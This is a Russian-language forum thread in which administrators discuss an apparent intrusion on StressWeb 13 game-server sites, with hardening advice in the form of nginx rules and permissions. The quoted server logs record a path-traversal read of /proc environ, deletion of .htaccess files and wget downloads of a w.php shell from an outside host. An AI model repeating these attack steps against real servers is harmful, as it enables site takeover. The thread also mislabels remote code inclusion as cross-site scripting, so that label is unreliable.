Уязвимости Stressweb 13

[ALAN 77]

Делать было нечего и решил я ненароком заглянуть в логи сервера, открыл самые старые и начал быстро пролистывать. Какого же было мое удивление когда я наткнулся на такие строки в отработчике fcgi

 

Sep 15 22:15:46.551306 [WARNING] fpm_stdio_child_said(), line 167: child 18889 (pool default) said into stderr: "[sat Sep 15 22:15:46 2012] [warn-phpd] mmap cache can't open /home/site/www/public_WWW/application/../../../../../proc/31949/environ - Permission denied (pid 18889)"

Sep 15 22:58:50.521598 [WARNING] fpm_stdio_child_said(), line 167: child 18881 (pool default) said into stderr: "sh: 0: command not found"

Sep 15 22:58:50.527109 [WARNING] fpm_stdio_child_said(), line 167: child 18881 (pool default) said into stderr: "sh: 0: command not found"

Sep 15 22:58:50.533681 [WARNING] fpm_stdio_child_said(), line 167: child 18881 (pool default) said into stderr: "sh: 0: command not found"

Sep 15 23:03:53.294177 [WARNING] fpm_stdio_child_said(), line 167: child 18883 (pool default) said into stderr: "rm: cannot remove `/home/site/www/public_WWW/cache/.htaccess': No such file or directory"

Sep 15 23:03:53.299984 [WARNING] fpm_stdio_child_said(), line 167: child 18883 (pool default) said into stderr: "rm: "

Sep 15 23:03:53.300113 [WARNING] fpm_stdio_child_said(), line 167: child 18883 (pool default) said into stderr: "cannot remove `/home/site/www/public_WWW/cache/.htaccess'"

Sep 15 23:03:53.300183 [WARNING] fpm_stdio_child_said(), line 167: child 18883 (pool default) said into stderr: ": No such file or directory"

Sep 15 23:03:53.300221 [WARNING] fpm_stdio_child_said(), line 167: child 18883 (pool default) said into stderr: ""

Sep 15 23:05:35.377689 [WARNING] fpm_stdio_child_said(), line 167: child 18888 (pool default) said into stderr: "rm: cannot remove `/home/site/www/forum.public_WWW/customavatars/index.html': Permission denied"

Sep 15 23:06:44.788091 [WARNING] fpm_stdio_child_said(), line 167: child 18864 (pool default) said into stderr: "cat: /home/site/www/public_WWW/cache/.htaccess: No such file or directory"

Sep 15 23:08:31.071273 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "--2012-09-15 23:08:31-- http://bigtraf777.na...uper.jpg/w.php"

Sep 15 23:08:31.071371 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Resolving bigtraf777.narod.ru... "

Sep 15 23:08:31.190293 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "213.180.199.38"

Sep 15 23:08:31.190390 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Connecting to bigtraf777.narod.ru|213.180.199.38|:80... "

Sep 15 23:08:31.206526 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "connected."

Sep 15 23:08:31.206628 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "HTTP request sent, awaiting response... "

Sep 15 23:08:31.230703 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "200 OK"

Sep 15 23:08:31.230881 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Length: 24885"

Sep 15 23:08:31.230926 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: " (24K) [application/octet-stream]"

Sep 15 23:08:31.231015 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "w.php: Permission denied"

Sep 15 23:08:31.231073 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: ""

Sep 15 23:08:31.231100 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Cannot write to `w.php' (Permission denied)."

Sep 15 23:08:31.237323 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "--2012-09-15 23:08:31-- http://bigtraf777.na...uper.jpg/w.php"

Sep 15 23:08:31.237398 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Resolving bigtraf777.narod.ru... "

Sep 15 23:08:31.239476 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "213.180.199.38"

Sep 15 23:08:31.239574 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Connecting to bigtraf777.narod.ru|213.180.199.38|:80... "

Sep 15 23:08:31.260610 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "connected."

Sep 15 23:08:31.260697 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "HTTP request sent, awaiting response... "

Sep 15 23:08:31.278255 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "200 OK"

Sep 15 23:08:31.278374 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Length: "

Sep 15 23:08:31.278428 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "24885"

Sep 15 23:08:31.278469 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: " (24K)"

Sep 15 23:08:31.278507 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: " [application/octet-stream]"

Sep 15 23:08:31.278553 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "w.php: Permission denied"

Sep 15 23:08:31.278601 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: ""

Sep 15 23:08:31.278627 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Cannot write to `w.php' (Permission denied)."

Sep 15 23:08:31.285959 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "--2012-09-15 23:08:31-- http://bigtraf777.na...uper.jpg/w.php"

Sep 15 23:08:31.286045 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Resolving bigtraf777.narod.ru... "

Sep 15 23:08:31.288344 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "213.180.199.38"

Sep 15 23:08:31.288425 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Connecting to bigtraf777.narod.ru|213.180.199.38|:80... "

Sep 15 23:08:31.365533 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "connected."

Sep 15 23:08:31.365608 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "HTTP request sent, awaiting response... "

Sep 15 23:08:31.388258 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "200 OK"

Sep 15 23:08:31.388370 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Length: "

Sep 15 23:08:31.388411 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "24885"

Sep 15 23:08:31.388454 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: " (24K) [application/octet-stream]"

Sep 15 23:08:31.388560 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "w.php: Permission denied"

Sep 15 23:08:31.388611 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: ""

Sep 15 23:08:31.388639 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Cannot write to `w.php' (Permission denied)."

Sep 15 23:11:49.034817 [WARNING] fpm_stdio_child_said(), line 167: child 18890 (pool default) said into stderr: "rm: cannot remove `/home/site/www/public_WWW/images/.htaccess': No such file or directory"

Sep 15 23:11:49.040454 [WARNING] fpm_stdio_child_said(), line 167: child 18890 (pool default) said into stderr: "rm: cannot remove `/home/site/www/public_WWW/images/.htaccess': No such file or directory"

Sep 15 23:12:34.902937 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: "ls: modules/"

Sep 15 23:12:34.903027 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: ": No such file or directory"

Sep 15 23:12:34.910153 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: "ls: modules/"

Sep 15 23:12:34.910279 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: ": No such file or directory"

Sep 15 23:12:34.917624 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: "ls: modules/"

Sep 15 23:12:34.917700 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: ": No such file or directory"

 

 

Сопоставив все это с аксесс логом подведем следующие итоги дамы и господа

 

StressWeb имеет уязвимость, а именно межсайтовый скриптинг. Залить шелл мне на хост в итоге не получилось по причине тонких настроек безопасности и нюансов в настройках NGINX

 

Несколько полезных советов как обезопасить себя. Актуально если используется NGINX, апач я не рассматриваю

 

Все папки в директории куда залит стрессвэб полжны иметь права 755 исключающие запись за исключением папки cache, для нее необходимы права 777

 

В конфиг хоста для ngix до передачи типа рнр на отработку добавляем:

 

В конфиг хоста для ngix до передачи типа рнр на отработку добавляем:

 

location ~* (config|admin|cache|account|application|dev)/.+\.php {

deny all;

}

 

Правило запрещает обращаться к рнр файлам там где это не нужно а так же запрещает обращение к рнр файлам в директории cache если туда каким то волшебным образом прилетит рнр файлик.

 

location ~* /templates/.+\.tpl {

deny all;

}

 

Правило запрещает сливать ваши tpl файлы дизайна сайта. Правило запрещает сливать ваши tpl файлы дизайна сайта. А именно чтобы не получилось вот так - http:// l2creed. ru/templates/creed123/index.tpl а затем вот так - http:// forummaxi. ru/index.php?showtopic=20316

 

Далее как и в моем случае пароли на мускул с конфигов скорее всего могут быть слиты, для того, что бы они оказались бесполезны на геймсервере и вэюсервере порт на фаерволе 3306 должен быть открыт только для разрешенных айпи. Подробности настройки таблеса под гейм тут - http://forummaxi.ru/index.php?app=tutorials&article=45

 

Касаемо подробностей стресса а дыра 100% там буду разбираться с утра на свежую голову. Могу лишь сказать одно, сервер не поимели благодаря этим настройкам.

 

ps

 

межсайтовый скриптинг это инклады и исполнение кода на вашей машине со сторонних адресов.

Изменено 4 декабря, 2012 пользователем ALAN

[jloopchief 69]

Был официальным клиентом SW13, при настройке веб-сервера (apache+php+mysql) были соблюдены все меры безопасности - стандартная процедура. Через некоторое время обнаружил на сайте шелл, благо настройки директорий веб-сервера не позволили привести его в действия, но как он там оказался для меня осталось загадкой. Либо есть уязвимость, либо есть backdoor - учитывая агрессивность конкуренции в этой сфере рынка, доверять нельзя никому

[ALAN 77]

Был официальным клиентом SW13, при настройке веб-сервера (apache+php+mysql) были соблюдены все меры безопасности - стандартная процедура. Через некоторое время обнаружил на сайте шелл, благо настройки директорий веб-сервера не позволили привести его в действия, но как он там оказался для меня осталось загадкой. Либо есть уязвимость, либо есть backdoor - учитывая агрессивность конкуренции в этой сфере рынка, доверять нельзя никому

 

То что не смогли запустить его с Вашей машины конечно снижает круг возможностей но поскольку есть возможность удаленного инклада и выполнение кода конфиги с паролями на мускул у Вас уверен слили 100%. Сижу сейчас подробно перебираю логи от начала и до конца какие запросы выполнялись и что делалось.

[ALAN 77]

Update

 

Если разрешена запись на папку то в нее можно запаковать весь ресурс для выгрузки.

 

Добавляем:

 

 

 

location ~* /templates/.+\.tpl {

deny all;

}

 

location ~* /cache/.+\.zip {

deny all;

}

 

location ~* /cache/.+\.bzip {

deny all;

}

 

location ~* /cache/.+\.gzip {

deny all;

}

 

location ~* /cache/.+\.gz {

deny all;

}

 

location ~* /cache/.+\.bz {

deny all;

}

 

location ~* /cache/.+\.bz2 {

deny all;

}

 

location ~* /cache/.+\.tar {

deny all;

}

 

 

 

PS

Пытался получить ответы от разработчиков но после показа логов мало того что не ответили, полный игнор теперь.

Изменено 4 декабря, 2012 пользователем ALAN

[logan22 169]

XSS не только на стресс вебе. И на IPB и да и на каждом четвёртом сайте такая уязвимость имеется.

 

Был официальным клиентом SW13, при настройке веб-сервера (apache+php+mysql) были соблюдены все меры безопасности - стандартная процедура.

 

Ну разработчики тоже люди и тоже хотят кушать, до того момента пока кто-то не найдет шелл ихний у вас на портале, а потом они хотят игнорить.

И Кстати не такой плохой SW как его малюют.

Как это не печально. Но если к Вашей базе маэскъюэль законнектиться кто-то, сервер можете закрывать.

 

Чем больше барьеров будет, тем лучше для безопасности...

[Mefestofel163 1333]

dell

Изменено 5 декабря, 2012 пользователем Mefestofel163

[stasuk25 17]

Спасибо конечно за инфу Теперь буду думать как еще защитить сайт...

[Saintly 19]

как выставить все эти права апач ? коды не подходят в .htaccess на сайте ошибка

 

Internal Server Error

 

The server encountered an internal error or misconfiguration and was unable to complete your request.

 

Please contact the server administrator, support@timeweb.ru and inform them of the time the error occurred, and anything you might have done that may have caused the error.

 

More information about this error may be available in the server error log.